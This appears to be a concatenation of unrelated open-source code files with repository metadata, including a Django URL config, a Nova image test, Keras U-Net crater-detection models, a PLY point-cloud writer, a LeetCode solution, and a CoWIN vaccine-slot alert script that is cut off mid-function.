# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^logs/$', logs),
# Examples:
url(r'^$', welcome),
# url(r'^pydetector/', include('pydetector.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
)
| 1.953125
| 2
|
nova/tests/functional/test_images.py
|
lixiaoy1/nova
| 1
|
12782937
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.tests.functional.api import client
from nova.tests.functional import test_servers
class ImagesTest(test_servers.ServersTestBase):
def test_create_images_negative_invalid_state(self):
# Create server
server = self._build_minimal_create_server_request()
created_server = self.api.post_server({"server": server})
server_id = created_server['id']
found_server = self._wait_for_state_change(created_server, 'BUILD')
self.assertEqual('ACTIVE', found_server['status'])
# Create image
name = 'Snapshot 1'
self.api.post_server_action(
server_id, {'createImage': {'name': name}})
self.assertEqual('ACTIVE', found_server['status'])
# Confirm that the image was created
images = self.api.get_images(detail=False)
image_map = {image['name']: image for image in images}
found_image = image_map.get(name)
self.assertTrue(found_image)
# Change server status from ACTIVE to SHELVED for negative test
self.flags(shelved_offload_time = -1)
self.api.post_server_action(server_id, {'shelve': {}})
found_server = self._wait_for_state_change(found_server, 'ACTIVE')
self.assertEqual('SHELVED', found_server['status'])
# Create image in SHELVED (not ACTIVE, etc.)
name = 'Snapshot 2'
ex = self.assertRaises(client.OpenStackApiException,
self.api.post_server_action,
server_id,
{'createImage': {'name': name}})
self.assertEqual(409, ex.response.status_code)
self.assertEqual('SHELVED', found_server['status'])
# Confirm that the image was not created
images = self.api.get_images(detail=False)
image_map = {image['name']: image for image in images}
found_image = image_map.get(name)
self.assertFalse(found_image)
# Cleanup
self._delete_server(server_id)
| 1.796875
| 2
|
tests/test.py
|
dirkmcpherson/gym-novel-gridworlds
| 2
|
12782938
|
<reponame>dirkmcpherson/gym-novel-gridworlds
import time
import gym
import gym_novel_gridworlds
from gym_novel_gridworlds.wrappers import SaveTrajectories, LimitActions
from gym_novel_gridworlds.observation_wrappers import LidarInFront, AgentMap
from gym_novel_gridworlds.novelty_wrappers import inject_novelty
from stable_baselines.common.policies import MlpPolicy
from stable_baselines.common.vec_env import DummyVecEnv
from stable_baselines import PPO2
env_id = 'NovelGridworld-Bow-v0' # 'NovelGridworld-v1'
env = gym.make(env_id)
env = LimitActions(env, {'Forward', 'Left', 'Right', 'Break', 'Craft_bow'})
env = LidarInFront(env)
env = inject_novelty(env, 'firewall', 'hard', '', '')
# Load the trained agent
model = PPO2.load('NovelGridworld-Bow-v0_1000_8beams0filled11hypotenuserange3items_in_360degrees_last_model')
# env.map_size = 20
# env.items_quantity = {'crafting_table': 2}
# env.action_str = {0: 'Forward', 1: 'Right', 2: 'Left'}
for i_episode in range(10):
print("EPISODE STARTS")
obs = env.reset()
for i in range(100):
action, _states = model.predict(obs)
obs, reward, done, info = env.step(action)
env.render()
# if i_episode == 0 and i == 0:
# time.sleep(10)
print("Episode #: " + str(i_episode) + ", step: " + str(i) + ", reward: ", reward)
# End the episode if agent is dead
if done:
print("Episode #: "+str(i_episode)+" finished after "+str(i)+" timesteps\n")
time.sleep(1)
break
| 2.21875
| 2
|
cnn_model/unet.py
|
WangSong960913/CraterDetection
| 5
|
12782939
|
from keras.models import Model
from keras.optimizers import Adam, SGD
from keras.layers.core import Dropout, Reshape
from keras.layers import PReLU, Conv2DTranspose
from keras.layers import Input, Dense, Dropout, LeakyReLU, BatchNormalization, Conv2D, MaxPooling2D, AveragePooling2D, \
concatenate, Activation, ZeroPadding2D
from keras.layers import add, Flatten
from keras.losses import mean_squared_error, binary_crossentropy, sparse_categorical_crossentropy
from keras import losses
import keras.backend as K
import numpy as np
from keras.regularizers import l2
# Check Keras version - code will switch API if needed.
from keras import __version__ as keras_version
k2 = True if keras_version[0] == '2' else False
# If Keras is v2.x.x, create Keras 1-syntax wrappers.
if not k2:
from keras.layers import merge, Input
from keras.layers.convolutional import (Convolution2D, MaxPooling2D,
UpSampling2D)
else:
from keras.layers import Concatenate, Input
from keras.layers.convolutional import (Conv2D, MaxPooling2D,
UpSampling2D)
def merge(layers, mode=None, concat_axis=None):
"""Wrapper for Keras 2's Concatenate class (`mode` is discarded)."""
return Concatenate(axis=concat_axis)(list(layers))
def Convolution2D(n_filters, FL, FLredundant, activation=None,
init=None, W_regularizer=None, border_mode=None):
"""Wrapper for Keras 2's Conv2D class."""
return Conv2D(n_filters, FL, activation=activation,
kernel_initializer=init,
kernel_regularizer=W_regularizer,
padding=border_mode)
def Conv(x, out_channels, dilation_rate=(1, 1)):
return Conv2D(out_channels, kernel_size=(3, 3), strides=(1, 1), dilation_rate=dilation_rate, padding='same')(x)
def UpConv(x, out_channels):
return Conv2DTranspose(out_channels, kernel_size=(3, 3), strides=(2, 2), padding='same', output_padding=(1, 1))(x)
def BN_Conv_Relu(x, out_channels, dilation_rate=(1, 1)):
x = BatchNormalization(axis=3, momentum=0.01)(x)
x = Conv2D(out_channels, kernel_size=(3, 3), strides=(1, 1), dilation_rate=dilation_rate, padding='same')(x)
x = ReLU()(x)
return x
def BN_UpConv_Relu(x, out_channels):
x = BatchNormalization(axis=3, momentum=0.01)(x)
x = UpConv(x, out_channels)
x = Activation('relu')(x)
return x
def ConvOut(x):
return Conv2D(1, kernel_size=(1, 1), strides=(1, 1), padding='valid')(x)
def unet_pooling_3(dim,start_filter,lr=0.0001):
inpt = Input(batch_shape=(None, dim, dim, 1))
BCR3 = BN_Conv_Relu(inpt, start_filter) # BUCR40
BCR4 = BN_Conv_Relu(BCR3, start_filter)
MP5 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='valid')(BCR4)
BCR6 = BN_Conv_Relu(MP5, start_filter*2)
BCR7 = BN_Conv_Relu(BCR6, start_filter*2) # BUCR36
BCR8 = BN_Conv_Relu(BCR7, start_filter*2)
MP9 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='valid')(BCR8)
BCR10 = BN_Conv_Relu(MP9, start_filter*4)
BCR11 = BN_Conv_Relu(BCR10, start_filter*4) # BUCR32
BCR12 = BN_Conv_Relu(BCR11, start_filter*4)
MP13 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='valid')(BCR12)
BCR30 = BN_Conv_Relu(MP13, start_filter*4)
BCR31 = BN_Conv_Relu(BCR30, start_filter*4)
BUCR32 = BN_UpConv_Relu(BCR31, start_filter*4) # BCR11
Add33 = add([BUCR32, BCR11])
BCR34 = BN_Conv_Relu(Add33, start_filter*4)
BCR35 = BN_Conv_Relu(BCR34, start_filter*4)
BUCR36 = BN_UpConv_Relu(BCR35, start_filter*2) # BCR7
Add37 = add([BUCR36, BCR7])
BCR38 = BN_Conv_Relu(Add37, start_filter*2)
BCR39 = BN_Conv_Relu(BCR38, start_filter*2)
BUCR40 = BN_UpConv_Relu(BCR39, start_filter) # BCR3
Add41 = add([BUCR40, BCR3])
BCR42 = BN_Conv_Relu(Add41, start_filter)
BCR43 = BN_Conv_Relu(BCR42, start_filter)
CO44 = ConvOut(BCR43)
out = Conv2D(1, 1, activation='sigmoid', padding='same')(CO44)
out = Reshape((dim, dim))(out)
model = Model(inputs=inpt, outputs=out) # convd2d
optimizer = Adam(lr=lr)
model.compile(loss='binary_crossentropy', metrics=['binary_accuracy'], optimizer=optimizer)
model.summary()
return model
#<NAME>'s UNet for Carter decter
def unet(dim, learn_rate, lmbda, drop, FL, init, n_filters):
"""Function that builds the (UNET) convolutional neural network.
Parameters
----------
dim : int
Dimension of input images (assumes square).
learn_rate : float
Learning rate.
lmbda : float
Convolution2D regularization parameter.
drop : float
Dropout fraction.
FL : int
Filter length.
init : string
Weight initialization type.
n_filters : int
Number of filters in each layer.
Returns
-------
model : keras model object
Constructed Keras model.
"""
print('Making UNET model...')
img_input = Input(batch_shape=(None, dim, dim, 1))
a1 = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(img_input)
a1 = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a1)
a1P = MaxPooling2D((2, 2), strides=(2, 2))(a1)
a2 = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a1P)
a2 = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a2)
a2P = MaxPooling2D((2, 2), strides=(2, 2))(a2)
a3 = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a2P)
a3 = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a3)
a3P = MaxPooling2D((2, 2), strides=(2, 2), )(a3)
u = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a3P)
u = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a3, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a2, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a1, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
# Final output
final_activation = 'sigmoid'
u = Convolution2D(1, 1, 1, activation=final_activation, init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Reshape((dim, dim))(u)
if k2:
model = Model(inputs=img_input, outputs=u)
else:
model = Model(input=img_input, output=u)
optimizer = Adam(lr=learn_rate)
model.compile(loss='binary_crossentropy',metrics=['binary_accuracy'], optimizer=optimizer)
print(model.summary())
return model
def unet_ConvT(dim, learn_rate, lmbda, drop, FL, init, n_filters):
"""Function that builds the (UNET) convolutional neural network.
Parameters
----------
dim : int
Dimension of input images (assumes square).
learn_rate : float
Learning rate.
lmbda : float
Convolution2D regularization parameter.
drop : float
Dropout fraction.
FL : int
Filter length.
init : string
Weight initialization type.
n_filters : int
Number of filters in each layer.
Returns
-------
model : keras model object
Constructed Keras model.
"""
print('Making UNET model...')
img_input = Input(batch_shape=(None, dim, dim, 1))
a1 = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(img_input)
a1 = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a1)
a1P = MaxPooling2D((2, 2), strides=(2, 2))(a1)
a2 = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a1P)
a2 = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a2)
a2P = MaxPooling2D((2, 2), strides=(2, 2))(a2)
a3 = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a2P)
a3 = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a3)
a3P = MaxPooling2D((2, 2), strides=(2, 2), )(a3)
u = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a3P)
u = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Conv2DTranspose(n_filters * 4, (3, 3), strides=(2, 2), padding="same")(u)
u = merge((a3, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Conv2DTranspose(n_filters* 2, (3, 3), strides=(2, 2), padding="same")(u)
u = merge((a2, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Conv2DTranspose(n_filters, (3, 3), strides=(2, 2), padding="same")(u)
u = merge((a1, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
# Final output
final_activation = 'sigmoid'
u = Convolution2D(1, 1, 1, activation=final_activation, init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Reshape((dim, dim))(u)
if k2:
model = Model(inputs=img_input, outputs=u)
else:
model = Model(input=img_input, output=u)
optimizer = Adam(lr=learn_rate)
model.compile(loss='binary_crossentropy',metrics=['binary_accuracy'], optimizer=optimizer)
print(model.summary())
return model
#<NAME>'s UNet deeper
def unet_deeper(dim, learn_rate, lmbda, drop, FL, init, n_filters):
print('Making UNET model...')
img_input = Input(batch_shape=(None, dim, dim, 1))
a1 = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(img_input)
a1 = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a1)
a1P = MaxPooling2D((2, 2), strides=(2, 2))(a1)
a2 = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a1P)
a2 = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a2)
a2P = MaxPooling2D((2, 2), strides=(2, 2))(a2)
a3 = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a2P)
a3 = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a3)
a3P = MaxPooling2D((2, 2), strides=(2, 2), )(a3)
a4 = Convolution2D(n_filters * 8, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a3P)
a4 = Convolution2D(n_filters * 8, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a4)
a4P = MaxPooling2D((2, 2), strides=(2, 2), )(a4)
u = Convolution2D(n_filters * 8, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(a4P)
u = Convolution2D(n_filters * 8, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a4, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters * 4, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a3, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters * 2, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a2, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = UpSampling2D((2, 2))(u)
u = merge((a1, u), mode='concat', concat_axis=3)
u = Dropout(drop)(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Convolution2D(n_filters, FL, FL, activation='relu', init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
# Final output
final_activation = 'sigmoid'
u = Convolution2D(1, 1, 1, activation=final_activation, init=init,
W_regularizer=l2(lmbda), border_mode='same')(u)
u = Reshape((dim, dim))(u)
if k2:
model = Model(inputs=img_input, outputs=u)
else:
model = Model(input=img_input, output=u)
optimizer = Adam(lr=learn_rate)
model.compile(loss='binary_crossentropy',metrics=['binary_accuracy'], optimizer=optimizer)
print(model.summary())
return model
if __name__ == '__main__':
#simple_resunet_upsample(256,112)#21,368,705
unet_deeper(256,0.0001,1e-6,0.15,3,'he_normal',112)
| 2.53125
| 3
|
CSD_API/REFCODEs_to_CIFs.py
|
andrewtarzia/cage_collect
| 0
|
12782940
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Distributed under the terms of the MIT License.
"""
Script to convert list of REFCODEs into CIFs.
No constraints are applied.
Author: <NAME>
Date Created: 12 May 2019
"""
import ccdc.io
import sys
import CSD_f
def main():
if (not len(sys.argv) == 4):
print """
Usage: REFCODEs_to_CIFs.py REFCODE_file missing_struct
REFCODE_file (str) -
file with list of REFCODEs
missing_struct (str) -
file with list of REFCODEs with missing structs
cross_references (str) -
file with list of REFCODEs that require cross_references
"""
sys.exit()
else:
RCODE_file = sys.argv[1]
missing_struct = sys.argv[2]
cross_references = sys.argv[3]
# read in CSD and updates
entry_reader = CSD_f.get_entryreader()
REFCODEs = []
for line in open(RCODE_file, 'r'):
REFCODEs.append(line.rstrip())
RC_nostruct = []
RC_CR = []
for i, RC in enumerate(sorted(REFCODEs)):
entry = entry_reader.entry(RC)
crystal = None
if entry.has_3d_structure:
crystal = entry.crystal
elif entry.has_3d_structure is False:
# test if CSD REFCODE is of type XXXXXX01
# which implies that XXXXXX will have coordinates and
# this is a child entry
# only assuming this can be the case a new REFCODE is in
if len(entry.cross_references) == 0:
# print 'struct missing: '+str(RC)+' '
# +str(entry.ccdc_number)
RC_nostruct.append(RC)
continue
else:
for CR in entry.cross_references:
# check if cross ref type is coordinates
if CR.type == 'Coordinates ref':
idents = CR.identifiers
for ID in idents:
try:
new_entry = entry_reader.entry(ID)
except RuntimeError:
# implies this new entry ID is not in
# the CSD
RC_nostruct.append(RC)
continue
if new_entry.has_3d_structure:
crystal = new_entry.crystal
RC_CR.append((RC, ID))
break
# write to CIF - saves as REFCODE in input file even if cross
# reference is used
if crystal is not None:
ccdc.io.CrystalWriter(RC+'_extracted.cif').write(crystal)
print '-------------------------------------------------'
print 'structures missing: '+str(len(RC_nostruct))+' of '+str(len(REFCODEs))
with open(missing_struct, 'w') as f:
for RC in RC_nostruct:
f.write(RC+'\n')
print '-------------------------------------------------'
print 'cross refs used: '+str(len(RC_CR))+' of '+str(len(REFCODEs))
with open(cross_references, 'w') as f:
for RC, CR in RC_CR:
f.write(RC+','+CR+'\n')
if __name__ == "__main__":
main()
| 2.90625
| 3
|
bookworm/search/templatetags/results.py
|
srilatha44/threepress
| 2
|
12782941
|
<gh_stars>1-10
import logging
from lxml import etree
from lxml.html import soupparser
from django import template
log = logging.getLogger('library.templatetags')
register = template.Library()
@register.inclusion_tag('includes/result.html', takes_context=True)
def display_result(context, htmlfile, search_term):
'''Render a result with the matching context.'''
context = result_fragment(htmlfile.processed_content, search_term)
return {'result': htmlfile,
'context':context }
def result_fragment(content, search_term):
'''Primitive result context handler'''
try:
parsed_content = soupparser.fromstring(content)
for p in parsed_content.iter(tag='p'):
words = [w for w in ' '.join((w.lower() for w in p.xpath('text()'))).split(' ')]
if search_term.lower() in words:
return etree.tostring(p)
except Exception, e:
log.error(e)
| 2.65625
| 3
|
app/models/message.py
|
Info-ag/labplaner
| 7
|
12782942
|
from datetime import datetime
from app.models import db
__all__ = ['Message']
class Message(db.Model):
"""Message
Messages only have an author. They are either connected to a working
group (AG) or to an individual user (recepient).
:param id:
:param message:
:param time:
:param author_id:
:param ag_id:
:param recepient_id:
Relationships:
- users_messages: status of a message (recepient only)
"""
__tablename__ = 'messages'
id = db.Column(db.Integer, primary_key=True, unique=True, nullable=False)
message = db.Column(db.Text(1000), nullable=False)
time = db.Column(db.DateTime, default=datetime.now())
author_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=True)
ag_id = db.Column(db.Integer, db.ForeignKey('ags.id'), nullable=True)
recepient_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=True)
author = db.relationship(
'User',
back_populates='messages',
primaryjoin='User.id == Message.author_id',)
recepient = db.relationship(
'User',
back_populates='messages',
primaryjoin='User.id == Message.recepient_id',)
ag = db.relationship('AG', back_populates='messages')
| 2.921875
| 3
|
webapp/__init__.py
|
Copyrighted/portfolio
| 0
|
12782943
|
<filename>webapp/__init__.py
from flask import Flask
from flask_mail import Mail
from flaskext.markdown import Markdown
from webapp.config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_bootstrap import Bootstrap
from flask_wtf.csrf import CSRFProtect
from flask_migrate import Migrate
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
migrate = Migrate(compare_type=True)
app = Flask(__name__)
migrate.init_app(app)
bootstrap = Bootstrap(app)
csrf = CSRFProtect(app)
csrf.init_app(app)
app.config.from_object(Config)
db = SQLAlchemy(app)
login = LoginManager(app)
login.session_protection = 'strong'
login.login_view = 'login'
migrate = Migrate(app, db)
engine = create_engine(Config.SQLALCHEMY_DATABASE_URI)
Session = sessionmaker()
Session.configure(bind=engine)
session = scoped_session(Session)
Markdown(app)
app.static_folder = 'static'
from webapp import routes, models
| 2.28125
| 2
|
utils/ply_utils.py
|
WeberSamuel/MonoRecPL
| 0
|
12782944
|
<filename>utils/ply_utils.py
from array import array
import torch
from monorec.model.layers import Backprojection
class PLYSaver(torch.nn.Module):
def __init__(self, height, width, min_d=3, max_d=400, batch_size=1, roi=None, dropout=0):
super(PLYSaver, self).__init__()
self.min_d = min_d
self.max_d = max_d
self.roi = roi
self.dropout = dropout
self.data = array('f')
self.projector = Backprojection(batch_size, height, width)
def save(self, file):
length = len(self.data) // 6
header = "ply\n" \
"format binary_little_endian 1.0\n" \
f"element vertex {length}\n" \
f"property float x\n" \
f"property float y\n" \
f"property float z\n" \
f"property float red\n" \
f"property float green\n" \
f"property float blue\n" \
f"end_header\n"
file.write(header.encode(encoding="ascii"))
self.data.tofile(file)
def add_depthmap(self, depth: torch.Tensor, image: torch.Tensor, intrinsics: torch.Tensor,
extrinsics: torch.Tensor):
depth = 1 / depth
image = (image + .5) * 255
mask = (self.min_d <= depth) & (depth <= self.max_d)
if self.roi is not None:
mask[:, :, :self.roi[0], :] = False
mask[:, :, self.roi[1]:, :] = False
mask[:, :, :, self.roi[2]] = False
mask[:, :, :, self.roi[3]:] = False
if self.dropout > 0:
mask = mask & (torch.rand_like(depth) > self.dropout)
coords = self.projector(depth, torch.inverse(intrinsics))
coords = extrinsics @ coords
coords = coords[:, :3, :]
data_batch = torch.cat([coords, image.view_as(coords)], dim=1).permute(0, 2, 1)
data_batch = data_batch[mask.view(depth.shape[0], 1, -1).permute(0, 2, 1).expand(-1, -1, 6)]
self.data.extend(data_batch.cpu().tolist())
| 2.4375
| 2
|
code_week9_622_628/pattern_matching_lcci.py
|
dylanlee101/leetcode
| 0
|
12782945
|
<reponame>dylanlee101/leetcode
'''
你有两个字符串,即pattern和value。 pattern字符串由字母"a"和"b"组成,用于描述字符串中的模式。例如,字符串"catcatgocatgo"匹配模式"aabab"(其中"cat"是"a","go"是"b"),该字符串也匹配像"a"、"ab"和"b"这样的模式。但需注意"a"和"b"不能同时表示相同的字符串。编写一个方法判断value字符串是否匹配pattern字符串。
示例 1:
输入: pattern = "abba", value = "dogcatcatdog"
输出: true
示例 2:
输入: pattern = "abba", value = "dogcatcatfish"
输出: false
示例 3:
输入: pattern = "aaaa", value = "dogcatcatdog"
输出: false
示例 4:
输入: pattern = "abba", value = "dogdogdogdog"
输出: true
解释: "a"="dogdog",b="",反之也符合规则
提示:
0 <= len(pattern) <= 1000
0 <= len(value) <= 1000
你可以假设pattern只包含字母"a"和"b",value仅包含小写字母。
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/pattern-matching-lcci
'''
class Solution:
def patternMatching(self, pattern: str, value: str) -> bool:
count_a = sum(1 for ch in pattern if ch == 'a')
count_b = len(pattern) - count_a
if count_a < count_b:
count_a, count_b = count_b, count_a
pattern = ''.join('a' if ch == 'b' else 'b' for ch in pattern)
if not value:
return count_b == 0
if not pattern:
return False
for len_a in range(len(value) // count_a + 1):
rest = len(value) - count_a * len_a
if (count_b == 0 and rest == 0) or (count_b != 0 and rest % count_b == 0):
len_b = 0 if count_b == 0 else rest // count_b
pos, correct = 0, True
value_a, value_b = None, None
for ch in pattern:
if ch == 'a':
sub = value[pos:pos + len_a]
if not value_a:
value_a = sub
elif value_a != sub:
correct = False
break
pos += len_a
else:
sub = value[pos:pos + len_b]
if not value_b:
value_b = sub
elif value_b != sub:
correct = False
break
pos += len_b
if correct and value_a != value_b:
return True
return False
| 3.359375
| 3
|
my_project/init_ephys.py
|
ttngu207/u24-example-ephys-pipeline
| 0
|
12782946
|
import datajoint as dj
from djsubject import subject
from djlab import lab
from djephys import ephys
from my_project.utils import get_ephys_probe_data_dir, get_ks_data_dir
# ============== Declare "lab" and "subject" schema ==============
lab.declare('u24_lab')
subject.declare('u24_subject',
dependencies={'Source': lab.Source,
'Lab': lab.Lab,
'Protocol': lab.Protocol,
'User': lab.User})
# ============== Declare Session table ==============
schema = dj.schema('u24_experiment')
@schema
class Session(dj.Manual):
definition = """
-> subject.Subject
session_datetime: datetime
"""
# ============== Declare "ephys" schema ==============
ephys.declare(dj.schema('u24_ephys'),
dependencies={'Subject': subject.Subject,
'Session': Session,
'Location': lab.Location,
'get_npx_data_dir': get_ephys_probe_data_dir,
'get_ks_data_dir': get_ks_data_dir})
# ---- Add neuropixels probes ----
for probe_type in ('neuropixels 1.0 - 3A', 'neuropixels 1.0 - 3B',
'neuropixels 2.0 - SS', 'neuropixels 2.0 - MS'):
ephys.ProbeType.create_neuropixels_probe(probe_type)
| 2.171875
| 2
|
cowin_appointment_check.py
|
Bharys/India-Covid-Vaccination-Alert
| 1
|
12782947
|
<gh_stars>1-10
import requests
import datetime,pprint,time
import smtplib, ssl
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
curr_date = datetime.date.today().strftime('%d-%m-%Y')
mys_restricted_pin = [
570008,571186,570026,570020,570004,570010,570004,570001,570013,570007,570001,\
570002,570017,570010,570020,570008,570001,570010,570019,570012,570014,570008,570023,570011,\
570001,570004,570001,570024,570004,570023,570019,570004,570001,570006,570021,570016,570004,\
570001,570004,570008,570005,570008,570007,570004,570010,570021,570015,570011,570007,570020,\
570004,570006,570009,570004,570021,570015,570011,570003,570008,570021,570019,570005,570004,\
570002,570008,570017,570008,570020,571130
]
jayanagara_pin = [560011,560069]
district_code = {'mysore':266,'chamarajanagar':271,'bbmp':294}
dist_payload = {'district_id':district_code['mysore'],'date':curr_date} #default payload
subscribers=[
{'age':18,
'district':'mysore',
'to_email':[],#add email
'restricted_pin':mys_restricted_pin,
'restricted_hospital':[],#add hospital center code
'name':'Mysuru City',
'dose':1
},
{'age':18,
'district':'chamarajanagar',
'to_email':[],#add email
'name':'Chamarajanagara District',
'dose':1
},
{'age':45,
'district':'bbmp',
'to_email':[],
'restricted_pin':jayanagara_pin,
'name':'Jayanagara, Bengaluru',
'dose':2
},
{'age':45,
'district':'mysore',
'to_email':[],
'name':'Mysore City',
'restricted_pin':mys_restricted_pin,
'date':'29-06-2021',
'dose':2
}
]
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36",
'content-type': 'application/json',
"Accept-Language":'hi-IN'
}
smtpServer = "smtp.gmail.com"
port = 587
from_email = ''#add gmail
pswd = <PASSWORD>
context = ssl.create_default_context()
pp = pprint.PrettyPrinter(indent=4)
dist_url = 'https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByDistrict'
master_data={}
booking_website = 'https://selfregistration.cowin.gov.in/'
table_style = """
<style>
table,th,tr,td{
border:0.1px solid black
}
table{
border-collapse:collapse
}
</style>
"""
def get_from_date(s_idx):
group = subscribers[s_idx]
ret_date = curr_date
if('date' in group and (time.strptime(group['date'],'%d-%m-%Y') > time.strptime(curr_date,'%d-%m-%Y'))):ret_date = group['date']
return ret_date
def send_email(email_content,place_name,to_email=[],age=18,dose=1):
try:
if(len(to_email)>0):
